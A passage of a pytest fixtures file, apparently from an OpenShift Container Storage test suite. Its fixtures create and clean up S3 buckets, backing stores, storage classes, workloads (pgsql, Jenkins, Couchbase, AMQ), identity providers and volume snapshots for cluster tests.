return uploaded_objects_fixture(
request, mcg_obj, awscli_pod, verify_rgw_restart_count
)
@pytest.fixture(scope="session")
def uploaded_objects_session(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
):
return uploaded_objects_fixture(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
)
def uploaded_objects_fixture(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
"""
Deletes all objects that were created as part of the test
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
awscli_pod (Pod): A pod running the AWSCLI tools
Returns:
list: An empty list of objects
"""
uploaded_objects_paths = []
def object_cleanup():
for uploaded_filename in uploaded_objects_paths:
log.info(f"Deleting object {uploaded_filename}")
awscli_pod.exec_cmd_on_pod(
command=craft_s3_command("rm " + uploaded_filename, mcg_obj),
secrets=[
mcg_obj.access_key_id,
mcg_obj.access_key,
mcg_obj.s3_internal_endpoint,
],
)
request.addfinalizer(object_cleanup)
return uploaded_objects_paths
@pytest.fixture()
def verify_rgw_restart_count(request):
return verify_rgw_restart_count_fixture(request)
@pytest.fixture(scope="session")
def verify_rgw_restart_count_session(request):
return verify_rgw_restart_count_fixture(request)
def verify_rgw_restart_count_fixture(request):
"""
Verifies the RGW restart count at start and end of a test
"""
if config.ENV_DATA["platform"].lower() in constants.ON_PREM_PLATFORMS:
log.info("Getting RGW pod restart count before executing the test")
initial_counts = get_rgw_restart_counts()
def finalizer():
rgw_pods = get_rgw_pods()
for rgw_pod in rgw_pods:
rgw_pod.reload()
log.info("Verifying whether RGW pods changed after executing the test")
for rgw_pod in rgw_pods:
assert rgw_pod.restart_count in initial_counts, "RGW pod restarted"
request.addfinalizer(finalizer)
@pytest.fixture()
def rgw_bucket_factory(request, rgw_obj):
if rgw_obj:
return bucket_factory_fixture(request, rgw_obj=rgw_obj)
else:
return None
@pytest.fixture(scope="session")
def rgw_bucket_factory_session(request, rgw_obj_session):
if rgw_obj_session:
return bucket_factory_fixture(request, rgw_obj=rgw_obj_session)
else:
return None
@pytest.fixture()
def bucket_factory(request, bucket_class_factory, mcg_obj):
"""
Returns an MCG bucket factory.
If MCG object not found returns None
"""
if mcg_obj:
return bucket_factory_fixture(request, bucket_class_factory, mcg_obj)
else:
return None
@pytest.fixture(scope="session")
def bucket_factory_session(request, bucket_class_factory_session, mcg_obj_session):
"""
Returns a session-scoped MCG bucket factory.
If session-scoped MCG object not found returns None
"""
if mcg_obj_session:
return bucket_factory_fixture(
request, bucket_class_factory_session, mcg_obj_session
)
else:
return None
def bucket_factory_fixture(
request, bucket_class_factory=None, mcg_obj=None, rgw_obj=None
):
"""
Create a bucket factory. Calling this fixture creates a new bucket(s).
For a custom amount, provide the 'amount' parameter.
***Please note***
Creation of buckets by utilizing the S3 interface *does not* support bucketclasses.
Only OC/CLI buckets can support different bucketclasses.
By default, all S3 buckets utilize the default bucketclass.
Args:
bucket_class_factory: creates a new Bucket Class
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
rgw_obj (RGW): An RGW object
"""
created_buckets = []
def _create_buckets(
amount=1,
interface="S3",
verify_health=True,
bucketclass=None,
replication_policy=None,
*args,
**kwargs,
):
"""
Creates and deletes all buckets that were created as part of the test
Args:
amount (int): The amount of buckets to create
interface (str): The interface to use for creation of buckets.
S3 | OC | CLI | NAMESPACE
verify_Health (bool): Whether to verify the created bucket's health
post-creation
bucketclass (dict): A dictionary describing a new
bucketclass to be created.
When None, the default bucketclass is used.
Returns:
list: A list of s3.Bucket objects, containing all the created
buckets
"""
if bucketclass:
interface = bucketclass["interface"]
current_call_created_buckets = []
if interface.lower() not in BUCKET_MAP:
raise RuntimeError(
f"Invalid interface type received: {interface}. "
f'available types: {", ".join(BUCKET_MAP.keys())}'
)
bucketclass = (
bucketclass if bucketclass is None else bucket_class_factory(bucketclass)
)
for _ in range(amount):
bucket_name = helpers.create_unique_resource_name(
resource_description="bucket", resource_type=interface.lower()
)
created_bucket = BUCKET_MAP[interface.lower()](
bucket_name,
mcg=mcg_obj,
rgw=rgw_obj,
bucketclass=bucketclass,
replication_policy=replication_policy,
*args,
**kwargs,
)
current_call_created_buckets.append(created_bucket)
created_buckets.append(created_bucket)
if verify_health:
created_bucket.verify_health(**kwargs)
return current_call_created_buckets
def bucket_cleanup():
for bucket in created_buckets:
log.info(f"Cleaning up bucket {bucket.name}")
try:
bucket.delete()
except ClientError as e:
if e.response["Error"]["Code"] == "NoSuchBucket":
log.warning(f"{bucket.name} could not be found in cleanup")
else:
raise
request.addfinalizer(bucket_cleanup)
return _create_buckets
@pytest.fixture(scope="class")
def cloud_uls_factory(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="session")
def cloud_uls_factory_session(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="function")
def mcg_job_factory(request, bucket_factory, project_factory, mcg_obj, tmp_path):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request, bucket_factory, project_factory, mcg_obj, tmp_path
)
@pytest.fixture(scope="session")
def mcg_job_factory_session(
request, bucket_factory_session, project_factory_session, mcg_obj_session, tmp_path
):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request,
bucket_factory_session,
project_factory_session,
mcg_obj_session,
tmp_path,
)
@pytest.fixture()
def backingstore_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If MCG object not found
"""
if mcg_obj:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
else:
return None
@pytest.fixture(scope="session")
def backingstore_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
else:
return None
@pytest.fixture()
def bucket_class_factory(
request, mcg_obj, backingstore_factory, namespace_store_factory
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If MCG object not found
"""
if mcg_obj:
return bucketclass_factory_implementation(
request, mcg_obj, backingstore_factory, namespace_store_factory
)
else:
return None
@pytest.fixture(scope="session")
def bucket_class_factory_session(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return bucketclass_factory_implementation(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
)
else:
return None
@pytest.fixture()
def multiregion_mirror_setup(bucket_factory):
return multiregion_mirror_setup_fixture(bucket_factory)
@pytest.fixture(scope="session")
def multiregion_mirror_setup_session(bucket_factory_session):
return multiregion_mirror_setup_fixture(bucket_factory_session)
def multiregion_mirror_setup_fixture(bucket_factory):
# Setup
# Todo:
# add region and amount parametrization - note that `us-east-1`
# will cause an error as it is the default region. If usage of `us-east-1`
# needs to be tested, keep the 'region' field out.
bucketclass = {
"interface": "CLI",
"backingstore_dict": {"aws": [(1, "us-west-1"), (1, "us-east-2")]},
"placement_policy": "Mirror",
}
# Create a NooBucket that'll use the bucket class in order to test
# the mirroring policy
bucket = bucket_factory(1, "OC", bucketclass=bucketclass)[0]
return bucket, bucket.bucketclass.backingstores
@pytest.fixture(scope="session")
def default_storageclasses(request, teardown_factory_session):
"""
Returns dictionary with storageclasses. Keys represent reclaim policy of
storageclass. There are two storageclasses for each key. First is RBD based
and the second one is CephFS based. Storageclasses with Retain Reclaim
Policy are created from default storageclasses.
"""
scs = {constants.RECLAIM_POLICY_DELETE: [], constants.RECLAIM_POLICY_RETAIN: []}
# TODO(fbalak): Use proper constants after
# https://github.com/red-hat-storage/ocs-ci/issues/1056
# is resolved
for sc_name in ("ocs-storagecluster-ceph-rbd", "ocs-storagecluster-cephfs"):
sc = OCS(kind=constants.STORAGECLASS, metadata={"name": sc_name})
sc.reload()
scs[constants.RECLAIM_POLICY_DELETE].append(sc)
sc.data["reclaimPolicy"] = constants.RECLAIM_POLICY_RETAIN
sc.data["metadata"]["name"] += "-retain"
sc._name = sc.data["metadata"]["name"]
sc.create()
teardown_factory_session(sc)
scs[constants.RECLAIM_POLICY_RETAIN].append(sc)
return scs
@pytest.fixture(scope="class")
def install_logging(request):
"""
Setup and teardown
* The setup will deploy openshift-logging in the cluster
* The teardown will uninstall cluster-logging from the cluster
"""
def finalizer():
uninstall_cluster_logging()
request.addfinalizer(finalizer)
csv = ocp.OCP(
kind=constants.CLUSTER_SERVICE_VERSION,
namespace=constants.OPENSHIFT_LOGGING_NAMESPACE,
)
logging_csv = csv.get().get("items")
if logging_csv:
log.info("Logging is already configured, Skipping Installation")
return
log.info("Configuring Openshift-logging")
# Checks OCP version
ocp_version = get_running_ocp_version()
logging_channel = "stable" if ocp_version >= "4.7" else ocp_version
# Creates namespace openshift-operators-redhat
ocp_logging_obj.create_namespace(yaml_file=constants.EO_NAMESPACE_YAML)
# Creates an operator-group for elasticsearch
assert ocp_logging_obj.create_elasticsearch_operator_group(
yaml_file=constants.EO_OG_YAML, resource_name="openshift-operators-redhat"
)
# Set RBAC policy on the project
assert ocp_logging_obj.set_rbac(
yaml_file=constants.EO_RBAC_YAML, resource_name="prometheus-k8s"
)
# Creates subscription for elastic-search operator
subscription_yaml = templating.load_yaml(constants.EO_SUB_YAML)
subscription_yaml["spec"]["channel"] = logging_channel
helpers.create_resource(**subscription_yaml)
assert ocp_logging_obj.get_elasticsearch_subscription()
# Creates a namespace openshift-logging
ocp_logging_obj.create_namespace(yaml_file=constants.CL_NAMESPACE_YAML)
# Creates an operator-group for cluster-logging
assert ocp_logging_obj.create_clusterlogging_operator_group(
yaml_file=constants.CL_OG_YAML
)
# Creates subscription for cluster-logging
cl_subscription = templating.load_yaml(constants.CL_SUB_YAML)
cl_subscription["spec"]["channel"] = logging_channel
helpers.create_resource(**cl_subscription)
assert ocp_logging_obj.get_clusterlogging_subscription()
# Creates instance in namespace openshift-logging
cluster_logging_operator = OCP(
kind=constants.POD, namespace=constants.OPENSHIFT_LOGGING_NAMESPACE
)
log.info(f"The cluster-logging-operator {cluster_logging_operator.get()}")
ocp_logging_obj.create_instance()
@pytest.fixture
def fio_pvc_dict():
"""
PVC template for fio workloads.
Note that all 'None' values needs to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture(scope="session")
def fio_pvc_dict_session():
"""
PVC template for fio workloads.
Note that all 'None' values needs to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture
def fio_configmap_dict():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture(scope="session")
def fio_configmap_dict_session():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture
def fio_job_dict():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="session")
def fio_job_dict_session():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="function")
def pgsql_factory_fixture(request):
"""
Pgsql factory fixture
"""
pgsql = Postgresql()
def factory(
replicas,
clients=None,
threads=None,
transactions=None,
scaling_factor=None,
timeout=None,
sc_name=None,
):
"""
Factory to start pgsql workload
Args:
replicas (int): Number of pgbench pods to be deployed
clients (int): Number of clients
threads (int): Number of threads
transactions (int): Number of transactions
scaling_factor (int): scaling factor
timeout (int): Time in seconds to wait
"""
# Setup postgres
pgsql.setup_postgresql(replicas=replicas, sc_name=sc_name)
# Create pgbench benchmark
pgsql.create_pgbench_benchmark(
replicas=replicas,
clients=clients,
threads=threads,
transactions=transactions,
scaling_factor=scaling_factor,
timeout=timeout,
)
# Wait for pg_bench pod to initialized and complete
pgsql.wait_for_pgbench_status(status=constants.STATUS_COMPLETED)
# Get pgbench pods
pgbench_pods = pgsql.get_pgbench_pods()
# Validate pgbench run and parse logs
pgsql.validate_pgbench_run(pgbench_pods)
return pgsql
def finalizer():
"""
Clean up
"""
pgsql.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def jenkins_factory_fixture(request):
"""
Jenkins factory fixture
"""
jenkins = Jenkins()
def factory(num_projects=1, num_of_builds=1):
"""
Factory to start jenkins workload
Args:
num_projects (int): Number of Jenkins projects
num_of_builds (int): Number of builds per project
"""
# Jenkins template
jenkins.create_ocs_jenkins_template()
# Init number of projects
jenkins.number_projects = num_projects
# Create app jenkins
jenkins.create_app_jenkins()
# Create jenkins pvc
jenkins.create_jenkins_pvc()
# Create jenkins build config
jenkins.create_jenkins_build_config()
# Wait jenkins deploy pod reach to completed state
jenkins.wait_for_jenkins_deploy_status(status=constants.STATUS_COMPLETED)
# Init number of builds per project
jenkins.number_builds_per_project = num_of_builds
# Start Builds
jenkins.start_build()
# Wait build reach 'Complete' state
jenkins.wait_for_build_to_complete()
# Print table of builds
jenkins.print_completed_builds_results()
return jenkins
def finalizer():
"""
Clean up
"""
jenkins.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def couchbase_new_factory_fixture(request):
"""
Couchbase factory fixture using Couchbase operator
"""
couchbase = CouchBase()
def factory(
replicas=3,
run_in_bg=False,
skip_analyze=True,
sc_name=None,
num_items=None,
num_threads=None,
):
"""
Factory to start couchbase workload
Args:
replicas (int): Number of couchbase workers to be deployed
run_in_bg (bool): Run IOs in background as option
skip_analyze (bool): Skip logs analysis as option
"""
# Create Couchbase subscription
couchbase.couchbase_subscription()
# Create Couchbase worker secrets
couchbase.create_cb_secrets()
# Create couchbase workers
couchbase.create_cb_cluster(replicas=3, sc_name=sc_name)
couchbase.create_data_buckets()
# Run couchbase workload
couchbase.run_workload(
replicas=replicas,
run_in_bg=run_in_bg,
num_items=num_items,
num_threads=num_threads,
)
# Run sanity check on data logs
couchbase.analyze_run(skip_analyze=skip_analyze)
return couchbase
def finalizer():
"""
Clean up
"""
couchbase.teardown()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def amq_factory_fixture(request):
"""
AMQ factory fixture
"""
amq = AMQ()
def factory(
sc_name,
kafka_namespace=constants.AMQ_NAMESPACE,
size=100,
replicas=3,
topic_name="my-topic",
user_name="my-user",
partitions=1,
topic_replicas=1,
num_of_producer_pods=1,
num_of_consumer_pods=1,
value="10000",
since_time=1800,
):
"""
Factory to start amq workload
Args:
sc_name (str): Name of storage clase
kafka_namespace (str): Namespace where kafka cluster to be created
size (int): Size of the storage
replicas (int): Number of kafka and zookeeper pods to be created
topic_name (str): Name of the topic to be created
user_name (str): Name of the user to be created
partitions (int): Number of partitions of topic
topic_replicas (int): Number of replicas of topic
num_of_producer_pods (int): Number of producer pods to be created
num_of_consumer_pods (int): Number of consumer pods to be created
value (str): Number of messages to be sent and received
since_time (int): Number of seconds to required to sent the msg
"""
# Setup kafka cluster
amq.setup_amq_cluster(
sc_name=sc_name, namespace=kafka_namespace, size=size, replicas=replicas
)
# Run open messages
amq.create_messaging_on_amq(
topic_name=topic_name,
user_name=user_name,
partitions=partitions,
replicas=topic_replicas,
num_of_producer_pods=num_of_producer_pods,
num_of_consumer_pods=num_of_consumer_pods,
value=value,
)
# Wait for some time to generate msg
waiting_time = 60
log.info(f"Waiting for {waiting_time}sec to generate msg")
time.sleep(waiting_time)
# Check messages are sent and received
threads = amq.run_in_bg(
namespace=kafka_namespace, value=value, since_time=since_time
)
return amq, threads
def finalizer():
"""
Clean up
"""
# Clean up
amq.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture
def measurement_dir(tmp_path):
"""
Returns directory path where should be stored all results related
to measurement. If 'measurement_dir' is provided by config then use it,
otherwise new directory is generated.
Returns:
str: Path to measurement directory
"""
if config.ENV_DATA.get("measurement_dir"):
measurement_dir = config.ENV_DATA.get("measurement_dir")
log.info(f"Using measurement dir from configuration: {measurement_dir}")
else:
measurement_dir = os.path.join(os.path.dirname(tmp_path), "measurement_results")
if not os.path.exists(measurement_dir):
log.info(f"Measurement dir {measurement_dir} doesn't exist. Creating it.")
os.mkdir(measurement_dir)
return measurement_dir
@pytest.fixture()
def multi_dc_pod(multi_pvc_factory, dc_pod_factory, service_account_factory):
"""
Prepare multiple dc pods for the test
Returns:
list: Pod instances
"""
def factory(
num_of_pvcs=1,
pvc_size=100,
project=None,
access_mode="RWO",
pool_type="rbd",
timeout=60,
):
dict_modes = {
"RWO": "ReadWriteOnce",
"RWX": "ReadWriteMany",
"RWX-BLK": "ReadWriteMany-Block",
}
dict_types = {"rbd": "CephBlockPool", "cephfs": "CephFileSystem"}
if access_mode in "RWX-BLK" and pool_type in "rbd":
modes = dict_modes["RWX-BLK"]
create_rbd_block_rwx_pod = True
else:
modes = dict_modes[access_mode]
create_rbd_block_rwx_pod = False
pvc_objs = multi_pvc_factory(
interface=dict_types[pool_type],
access_modes=[modes],
size=pvc_size,
num_of_pvc=num_of_pvcs,
project=project,
timeout=timeout,
)
dc_pods = []
dc_pods_res = []
sa_obj = service_account_factory(project=project)
with ThreadPoolExecutor() as p:
for pvc_obj in pvc_objs:
if create_rbd_block_rwx_pod:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=constants.CEPHBLOCKPOOL,
pvc=pvc_obj,
raw_block_pv=True,
sa_obj=sa_obj,
)
)
else:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=dict_types[pool_type],
pvc=pvc_obj,
sa_obj=sa_obj,
)
)
for dc in dc_pods_res:
pod_obj = dc.result()
if create_rbd_block_rwx_pod:
log.info(
"#### setting attribute pod_type since "
f"create_rbd_block_rwx_pod = {create_rbd_block_rwx_pod}"
)
setattr(pod_obj, "pod_type", "rbd_block_rwx")
else:
setattr(pod_obj, "pod_type", "")
dc_pods.append(pod_obj)
with ThreadPoolExecutor() as p:
for dc in dc_pods:
p.submit(
helpers.wait_for_resource_state,
resource=dc,
state=constants.STATUS_RUNNING,
timeout=120,
)
return dc_pods
return factory
@pytest.fixture(scope="session")
def htpasswd_path(tmpdir_factory):
"""
Returns:
string: Path to HTPasswd file with additional usernames
"""
return str(tmpdir_factory.mktemp("idp_data").join("users.htpasswd"))
@pytest.fixture(scope="session")
def htpasswd_identity_provider(request):
"""
Creates HTPasswd Identity provider.
Returns:
object: OCS object representing OCP OAuth object with HTPasswd IdP
"""
users.create_htpasswd_idp()
cluster = OCS(kind=constants.OAUTH, metadata={"name": "cluster"})
cluster.reload()
def finalizer():
"""
Remove HTPasswd IdP
"""
# TODO(fbalak): remove HTPasswd identityProvider
# cluster.ocp.patch(
# resource_name='cluster',
# params=f'[{ "op": "remove", "path": "/spec/identityProviders" }]'
# )
# users.delete_htpasswd_secret()
request.addfinalizer(finalizer)
return cluster
@pytest.fixture(scope="function")
def user_factory(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(scope="session")
def user_factory_session(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(autouse=True)
def log_alerts(request):
"""
Log alerts at the beginning and end of each test case. At the end of test
case print a difference: what new alerts are in place after the test is
complete.
"""
teardown = config.RUN["cli_params"].get("teardown")
dev_mode = config.RUN["cli_params"].get("dev_mode")
if teardown:
return
elif dev_mode:
log.info("Skipping alert check for development mode")
return
alerts_before = []
prometheus = None
try:
prometheus = PrometheusAPI()
except Exception:
log.exception("There was a problem with connecting to Prometheus")
def _collect_alerts():
try:
alerts_response = prometheus.get(
"alerts", payload={"silenced": False, "inhibited": False}
)
if alerts_response.ok:
alerts = alerts_response.json().get("data").get("alerts")
log.debug(f"Found alerts: {alerts}")
return alerts
else:
log.warning(
f"There was a problem with collecting alerts for analysis: {alerts_response.text}"
)
return False
except Exception:
log.exception("There was a problem with collecting alerts for analysis")
return False
def _print_diff():
if alerts_before:
alerts_after = _collect_alerts()
if alerts_after:
alerts_new = [
alert for alert in alerts_after if alert not in alerts_before
]
if alerts_new:
log.warning("During test were raised new alerts")
log.warning(alerts_new)
alerts_before = _collect_alerts()
request.addfinalizer(_print_diff)
@pytest.fixture(scope="session", autouse=True)
def ceph_toolbox(request):
"""
This fixture initiates ceph toolbox pod for manually created deployment
and if it does not already exist.
"""
deploy = config.RUN["cli_params"]["deploy"]
teardown = config.RUN["cli_params"].get("teardown")
skip_ocs = config.ENV_DATA["skip_ocs_deployment"]
deploy_teardown = deploy or teardown
managed_platform = (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
)
if not (deploy_teardown or skip_ocs) or (managed_platform and not deploy_teardown):
try:
# Creating toolbox pod
setup_ceph_toolbox()
except CommandFailed:
log.info("Failed to create toolbox")
@pytest.fixture(scope="function")
def node_drain_teardown(request):
"""
Tear down function after Node drain
"""
def finalizer():
"""
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by marking them as schedulable
"""
scheduling_disabled_nodes = [
n.name
for n in get_node_objs()
if n.ocp.get_resource_status(n.name)
== constants.NODE_READY_SCHEDULING_DISABLED
]
if scheduling_disabled_nodes:
schedule_nodes(scheduling_disabled_nodes)
ceph_health_check(tries=60)
request.addfinalizer(finalizer)
@pytest.fixture(scope="function")
def node_restart_teardown(request, nodes):
"""
Make sure all nodes are up and in 'Ready' state and if not,
try to make them 'Ready' by restarting the nodes.
"""
def finalizer():
# Start the powered off nodes
nodes.restart_nodes_by_stop_and_start_teardown()
try:
node.wait_for_nodes_status(status=constants.NODE_READY)
except ResourceWrongStatusException:
# Restart the nodes if in NotReady state
not_ready_nodes = [
n
for n in node.get_node_objs()
if n.ocp.get_resource_status(n.name) == constants.NODE_NOT_READY
]
if not_ready_nodes:
log.info(
f"Nodes in NotReady status found: {[n.name for n in not_ready_nodes]}"
)
nodes.restart_nodes_by_stop_and_start(not_ready_nodes)
node.wait_for_nodes_status(status=constants.NODE_READY)
request.addfinalizer(finalizer)
@pytest.fixture()
def mcg_connection_factory(request, mcg_obj, cld_mgr):
"""
Create a new MCG connection for given platform. If there already exists
a connection for the platform then return this previously created
connection.
"""
created_connections = {}
def _create_connection(platform=constants.AWS_PLATFORM, name=None):
"""
Args:
platform (str): Platform used for connection
name (str): New connection name. If not provided then new name will
be generated. New name will be used only if there is not
existing connection for given platform
Returns:
str: connection name
"""
if platform not in created_connections:
connection_name = name or create_unique_resource_name(
constants.MCG_CONNECTION, platform
)
mcg_obj.create_connection(cld_mgr, platform, connection_name)
created_connections[platform] = connection_name
return created_connections[platform]
def _connections_cleanup():
for platform in created_connections:
mcg_obj.delete_ns_connection(created_connections[platform])
request.addfinalizer(_connections_cleanup)
return _create_connection
@pytest.fixture()
def ns_resource_factory(
request, mcg_obj, cld_mgr, cloud_uls_factory, mcg_connection_factory
):
"""
Create a namespace resource factory. Calling this fixture creates a new namespace resource.
"""
created_ns_resources = []
def _create_ns_resources(platform=constants.AWS_PLATFORM):
# Create random connection_name
rand_connection = mcg_connection_factory(platform)
# Create the actual namespace resource
rand_ns_resource = create_unique_resource_name(
constants.MCG_NS_RESOURCE, platform
)
if platform == constants.RGW_PLATFORM:
region = None
else:
# TODO: fix this when https://github.com/red-hat-storage/ocs-ci/issues/3338
# is resolved
region = "us-east-2"
target_bucket_name = mcg_obj.create_namespace_resource(
rand_ns_resource,
rand_connection,
region,
cld_mgr,
cloud_uls_factory,
platform,
)
log.info(f"Check validity of NS resource {rand_ns_resource}")
if platform == constants.AWS_PLATFORM:
endpoint = constants.MCG_NS_AWS_ENDPOINT
elif platform == constants.AZURE_PLATFORM:
endpoint = constants.MCG_NS_AZURE_ENDPOINT
elif platform == constants.RGW_PLATFORM:
rgw_conn = RGW()
endpoint, _, _ = rgw_conn.get_credentials()
else:
raise UnsupportedPlatformError(f"Unsupported Platform: {platform}")
mcg_obj.check_ns_resource_validity(
rand_ns_resource, target_bucket_name, endpoint
)
created_ns_resources.append(rand_ns_resource)
return target_bucket_name, rand_ns_resource
def ns_resources_cleanup():
for ns_resource in created_ns_resources:
mcg_obj.delete_ns_resource(ns_resource)
request.addfinalizer(ns_resources_cleanup)
return _create_ns_resources
@pytest.fixture()
def namespace_store_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
@pytest.fixture(scope="session")
def namespace_store_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
@pytest.fixture()
def snapshot_factory(request):
"""
Snapshot factory. Calling this fixture creates a volume snapshot from the
specified PVC
"""
instances = []
def factory(pvc_obj, wait=True, snapshot_name=None):
"""
Args:
pvc_obj (PVC): PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name (str): Name to be provided for snapshot
Returns:
OCS: OCS instance of kind VolumeSnapshot
"""
snap_obj = pvc_obj.create_snapshot(snapshot_name=snapshot_name, wait=wait)
instances.append(snap_obj)
return snap_obj
def finalizer():
"""
Delete the snapshots
"""
snapcontent_objs = []
# Get VolumeSnapshotContent form VolumeSnapshots and delete
# VolumeSnapshots
for instance in instances:
if not instance.is_deleted:
snapcontent_objs.append(
helpers.get_snapshot_content_obj(snap_obj=instance)
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for VolumeSnapshotContents to be deleted
for snapcontent_obj in snapcontent_objs:
snapcontent_obj.ocp.wait_for_delete(
resource_name=snapcontent_obj.name, timeout=240
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_factory(snapshot_factory):
"""
Snapshot factory. Calling this fixture creates volume snapshots of each
PVC in the provided list
"""
def factory(pvc_obj, wait=True, snapshot_name_suffix=None):
"""
Args:
pvc_obj (list): List PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name_suffix (str): Suffix to be added to snapshot
Returns:
OCS: List of OCS instances of kind VolumeSnapshot
"""
snapshot = []
for obj in pvc_obj:
log.info(f"Creating snapshot of PVC {obj.name}")
snapshot_name = (
f"{obj.name}-{snapshot_name_suffix}" if snapshot_name_suffix else None
)
snap_obj = snapshot_factory(
pvc_obj=obj, snapshot_name=snapshot_name, wait=wait
)
snapshot.append(snap_obj)
return snapshot
return factory
@pytest.fixture()
def snapshot_restore_factory(request):
"""
Snapshot restore factory. Calling this fixture creates new PVC out of the
specified VolumeSnapshot.
"""
instances = []
def factory(
snapshot_obj,
restore_pvc_name=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
):
"""
Args:
snapshot_obj (OCS): OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_name (str): Name to be provided for restored pvc
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
Returns:
PVC: Restored PVC object
"""
snapshot_info = snapshot_obj.get()
size = size or snapshot_info["status"]["restoreSize"]
restore_pvc_name = restore_pvc_name or (
helpers.create_unique_resource_name(snapshot_obj.name, "restore")
)
if snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHBLOCKPOOL).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHBLOCKPOOL).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_RBD_PVC_RESTORE_YAML
interface = constants.CEPHBLOCKPOOL
elif snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHFILESYSTEM).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHFILESYSTEM).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_CEPHFS_PVC_RESTORE_YAML
interface = constants.CEPHFILESYSTEM
restored_pvc = create_restore_pvc(
sc_name=storageclass,
snap_name=snapshot_obj.name,
namespace=snapshot_obj.namespace,
size=size,
pvc_name=restore_pvc_name,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
)
instances.append(restored_pvc)
restored_pvc.snapshot = snapshot_obj
restored_pvc.interface = interface
if status:
helpers.wait_for_resource_state(restored_pvc, status)
return restored_pvc
def finalizer():
